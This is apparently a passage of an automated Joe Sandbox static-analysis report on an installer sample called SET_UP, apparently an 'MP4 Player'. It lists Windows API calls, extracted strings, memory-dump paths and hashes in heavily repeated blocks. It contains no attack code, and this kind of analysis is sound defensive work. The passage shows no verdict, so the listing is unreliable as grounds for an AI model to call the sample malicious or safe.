                                                                                                                                                                                                  • DH43Ydl65IZsIncKnCukuUZgGk8lLSBiC9JlaO5pxiioSXtl5iLTQEU1tnJMBYYUrjePIG9E6J210QFgWwjuRdsc2aw53GqaZ8NZn1itpwvhl52sBgi1RnIdSZhoMh5HDsHKqfILDCZFv6v28cEprsePAMJDPZRYkcZfO67eOCB7Nl66mjqbMZxkieIbqO773J8Qt94n, xrefs: 0042D16F
                                                                                                                                                                                                  • O2x, xrefs: 0042D16A
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharMultiWide$H_prologlstrlen
                                                                                                                                                                                                  • String ID: DH43Ydl65IZsIncKnCukuUZgGk8lLSBiC9JlaO5pxiioSXtl5iLTQEU1tnJMBYYUrjePIG9E6J210QFgWwjuRdsc2aw53GqaZ8NZn1itpwvhl52sBgi1RnIdSZhoMh5HDsHKqfILDCZFv6v28cEprsePAMJDPZRYkcZfO67eOCB7Nl66mjqbMZxkieIbqO773J8Qt94n$O2x
                                                                                                                                                                                                  • API String ID: 15792491-1487024302
                                                                                                                                                                                                  • Opcode ID: 918807a3faf2c6f5103b52547aa36839c79e8255ff1337fcfd3bad0e1b43736f
                                                                                                                                                                                                  • Instruction ID: 7dae4fdc46f3164a33aaad7653d4085f88cf5a82d21240e094289fe82bd8fb0b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 918807a3faf2c6f5103b52547aa36839c79e8255ff1337fcfd3bad0e1b43736f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2221B371E00228AADF10EA95CC45FEE7778AF04354F00416BF614E61C6DA7CEA54CBA9
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004C0464: SetBkColor.GDI32(A5A5D47D,?), ref: 004C046E
                                                                                                                                                                                                    • Part of subcall function 004C0464: ExtTextOutW.GDI32(A5A5D47D,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004C0484
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 00409968
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ColorCopyRectText
                                                                                                                                                                                                  • String ID: 000$000
                                                                                                                                                                                                  • API String ID: 2942875496-1659903649
                                                                                                                                                                                                  • Opcode ID: 76fd9f6673f0ff1199964a62212e4c41df5f0cbba771e9f0cd4d6a1604d6c173
                                                                                                                                                                                                  • Instruction ID: e4261128de05e3ab48bee50375693c033662dd262feb65b87427c380c0b90b23
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76fd9f6673f0ff1199964a62212e4c41df5f0cbba771e9f0cd4d6a1604d6c173
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C115CB5600105EBCF689F19C841EAF33ACEB44319B04413FF859E2382D638DD50CB59
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0041D27B
                                                                                                                                                                                                  • GetFileAttributesExW.KERNEL32(?,00000000,?), ref: 0041D2E4
                                                                                                                                                                                                    • Part of subcall function 004B223F: __EH_prolog.LIBCMT ref: 004B2244
                                                                                                                                                                                                    • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog$AttributesDecrementFileInterlocked
                                                                                                                                                                                                  • String ID: \\?\
                                                                                                                                                                                                  • API String ID: 3189372264-4282027825
                                                                                                                                                                                                  • Opcode ID: a969e720bf536afc4b9dd47a84f9e4d997f258e1223dc1082b30ab8f946df0af
                                                                                                                                                                                                  • Instruction ID: ab99f974e13cf17f60880bcfae5786fe61e2514c4c4f9dba26f7ea444a15c3f8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a969e720bf536afc4b9dd47a84f9e4d997f258e1223dc1082b30ab8f946df0af
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9511B471A0010CBFDB00EFA5CD81AEEBBA9EF04394F50412AF915E7190D7789E44C7A4
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0042C906
                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(00000000,000003FF), ref: 0042C941
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DirectoryH_prologWindows
                                                                                                                                                                                                  • String ID: \bootstat.dat
                                                                                                                                                                                                  • API String ID: 267778241-3340581324
                                                                                                                                                                                                  • Opcode ID: 809c75c3bb8c5f5f30f04107839fbce26dbfe17db5776a0ff9f4ceca5b51a32f
                                                                                                                                                                                                  • Instruction ID: a4819cab54d54e0b1b6568d446df3b77ed48ce680ecf3a8f8443c3ec73861aad
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 809c75c3bb8c5f5f30f04107839fbce26dbfe17db5776a0ff9f4ceca5b51a32f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B2184B1E00219ABCF14EBA4DD45BEEB7B8BF44704F00416AE551B3190DB789B04CB95
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00405E69
                                                                                                                                                                                                  • BitBlt.GDI32(00000001,?,?,?,?,?,?,?,00CC0020), ref: 00405ECA
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                  • String ID: VGL
                                                                                                                                                                                                  • API String ID: 3519838083-1461870441
                                                                                                                                                                                                  • Opcode ID: b9bde09658b15b9a9ecb758fdb79e7b7ccabf1a04ae072003ffda3473a0feb0f
                                                                                                                                                                                                  • Instruction ID: c47c0dd2ed25123d77661a7f479e15cc8a960f50679766d76dcb6a6db3a077be
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b9bde09658b15b9a9ecb758fdb79e7b7ccabf1a04ae072003ffda3473a0feb0f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2214D71900A05DFCB20DFA9C985A6BFBF5FF08304B104A2EE59653690C774A901CFA4
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                  • String ID: kbps$Auto
                                                                                                                                                                                                  • API String ID: 3519838083-1383899201
                                                                                                                                                                                                  • Opcode ID: 6f72ccfb6b37e4e1d1285a588751990e6347b6ffd7e863887f0ef2a7b00d9f37
                                                                                                                                                                                                  • Instruction ID: f0517e983c3985af7d61959fd3f52b695e5a78e81de0e4351f5d1ec8abc94d4e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f72ccfb6b37e4e1d1285a588751990e6347b6ffd7e863887f0ef2a7b00d9f37
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E114C71A0025AEBCF15EF91D892AFEB734FB14354F40442FF51166181DBBC9A48CB66
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • PathIsURLW.SHLWAPI(?), ref: 00435CD4
                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00435CE2
                                                                                                                                                                                                    • Part of subcall function 0042AD95: __EH_prolog.LIBCMT ref: 0042AD9A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Path$ExistsFileH_prolog
                                                                                                                                                                                                  • String ID: File does not exist.
                                                                                                                                                                                                  • API String ID: 584446075-164382929
                                                                                                                                                                                                  • Opcode ID: 8ffd6dfdc0ada0922521d999ad6e9a663775bf2aba6a4440ecc947e6ef0a675f
                                                                                                                                                                                                  • Instruction ID: 4018de0b06c009dd928bcfbcd451c996dbbe467974e9413f3b3b191da976ff6f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ffd6dfdc0ada0922521d999ad6e9a663775bf2aba6a4440ecc947e6ef0a675f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA0148317046055BC7105F299C88D2B7B99DB95329F60123AF816D73D2EE398C01872A
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00439E6B
                                                                                                                                                                                                    • Part of subcall function 00439D87: __EH_prolog.LIBCMT ref: 00439D8C
                                                                                                                                                                                                    • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog$DecrementInterlocked
                                                                                                                                                                                                  • String ID: fps$Auto
                                                                                                                                                                                                  • API String ID: 2206737547-3224325225
                                                                                                                                                                                                  • Opcode ID: c637915b557f5ca61ad6679d2be4a97ba0d41eafb27d3f6c89533cb22bfaadda
                                                                                                                                                                                                  • Instruction ID: 77db1c6673dc2b0d160f09009dd33c51f8983ef9816bc097edb1ffbd6d426d30
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c637915b557f5ca61ad6679d2be4a97ba0d41eafb27d3f6c89533cb22bfaadda
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4116A7180025AEBCF11EF91C952AFEBB74FF04708F04441FB91062181DBB89E04CBAA
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetMenuDefaultItem.USER32(00000000,00000001,00000001), ref: 0040D83B
                                                                                                                                                                                                  • SetMenuDefaultItem.USER32(00000000,?,00000001), ref: 0040D875
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: DefaultItemMenu
• String ID:
• API String ID: 2151095189-3916222277
APIs
• __EH_prolog.LIBCMT ref: 0042D43A
• CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 0042D4A0
  • Part of subcall function 004B223F: __EH_prolog.LIBCMT ref: 004B2244
  • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
Strings
Similarity
• API ID: H_prolog$CreateDecrementFileInterlocked
• String ID: \\?\
• API String ID: 989806476-4282027825
APIs
• __EH_prolog.LIBCMT ref: 00434F1C
  • Part of subcall function 0041CFC1: PathRemoveFileSpecW.SHLWAPI(?), ref: 0041D00A
• PathFileExistsW.SHLWAPI(?,?,?,?,?,00408BF1,00000000,00000000), ref: 00434F54
  • Part of subcall function 004B4184: MessageBoxW.USER32(?,?,?,?), ref: 004B41AC
Strings
Similarity
• API ID: FilePath$ExistsH_prologMessageRemoveSpec
• String ID: Folder does not exist!
• API String ID: 3713942814-470711484
APIs
• __EH_prolog.LIBCMT ref: 004215A2
  • Part of subcall function 00421620: __EH_prolog.LIBCMT ref: 00421625
  • Part of subcall function 004B20BD: lstrlenW.KERNEL32(00000000,?,?,004B1CC0,?,?,00403D3C,00000000,?,?,00403D1B,?,?,?,?,00403D01), ref: 004B20CE
Strings
Similarity
• API ID: H_prolog$lstrlen
• String ID: 5.3.10${E2F580C7-E02A-40b3-9907-8BE82F28DFE9}
• API String ID: 3243491680-702288499
APIs
• __EH_prolog.LIBCMT ref: 0042D307
  • Part of subcall function 004B55AA: SetDlgItemTextW.USER32(?,?,?), ref: 004B55BC
  • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
Strings
• MP4 Player, xrefs: 0042D321
• If you have a license of %s, please enter your user ID and license key., xrefs: 0042D329
Similarity
• API ID: DecrementH_prologInterlockedItemText
• String ID: If you have a license of %s, please enter your user ID and license key.$MP4 Player
• API String ID: 3198702148-2532209692
APIs
• GetDriveTypeA.KERNEL32(?), ref: 004A96AD
Strings
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DriveType
                                                                                                                                                                                                  • String ID: :$\
                                                                                                                                                                                                  • API String ID: 338552980-1166558509
                                                                                                                                                                                                  • Opcode ID: 0d9f35ee9a4061a634c8151825c366b079ef8105fce45cfbcdb2fcbaa39316e2
                                                                                                                                                                                                  • Instruction ID: 92e5024ba6ed3a019c5b48671a276836388deee78243ab51b8a56b466942331a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d9f35ee9a4061a634c8151825c366b079ef8105fce45cfbcdb2fcbaa39316e2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99E0487124828C69EF118E689484B9B3F9C8F22784F088056F84CCD292D679DE55C765
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetClassNameA.USER32(?,?,00000010), ref: 004AD1DE
                                                                                                                                                                                                  • lstrcmpA.KERNEL32(?,ComboBox,?,00000010), ref: 004AD1EE
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ClassNamelstrcmp
                                                                                                                                                                                                  • String ID: ComboBox
                                                                                                                                                                                                  • API String ID: 3770760073-1152790111
                                                                                                                                                                                                  • Opcode ID: 7dc4ee3c62511841f3adcf0c16322175d81904bac9a1d1bcd07a5968ae5c2b88
                                                                                                                                                                                                  • Instruction ID: aca3503869a4dfc4a5498f30d1972649034784229414c41519363f51c66dbfc1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7dc4ee3c62511841f3adcf0c16322175d81904bac9a1d1bcd07a5968ae5c2b88
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CE0DF70A002005BEB14EB68CC0AE2A33E8F728301F844A5AF00AC21A1F7BAD548821A
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GlobalAddAtomW.KERNEL32(?), ref: 004C5DAA
                                                                                                                                                                                                  • GlobalAddAtomW.KERNEL32(system), ref: 004C5DB8
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AtomGlobal
                                                                                                                                                                                                  • String ID: system
                                                                                                                                                                                                  • API String ID: 2189174293-3377271179
                                                                                                                                                                                                  • Opcode ID: e38f18ec7094624204f3d065f079180c77f3ec7655a750f729e82f220f61649d
                                                                                                                                                                                                  • Instruction ID: c30f50c047a5bbe5e4cb3da03fa0e3b36eb087986e58fb02b4588582cbb7711b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e38f18ec7094624204f3d065f079180c77f3ec7655a750f729e82f220f61649d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DDD022360183C056C62027BAEC00F87F3B9EFC0210F02002FD05983230CBA03841879A
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(?,0049C888,?,0049682E), ref: 0049D750
                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(?,0049C888,?,0049682E), ref: 0049D758
                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(?,0049C888,?,0049682E), ref: 0049D760
                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(?,0049C888,?,0049682E), ref: 0049D768
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
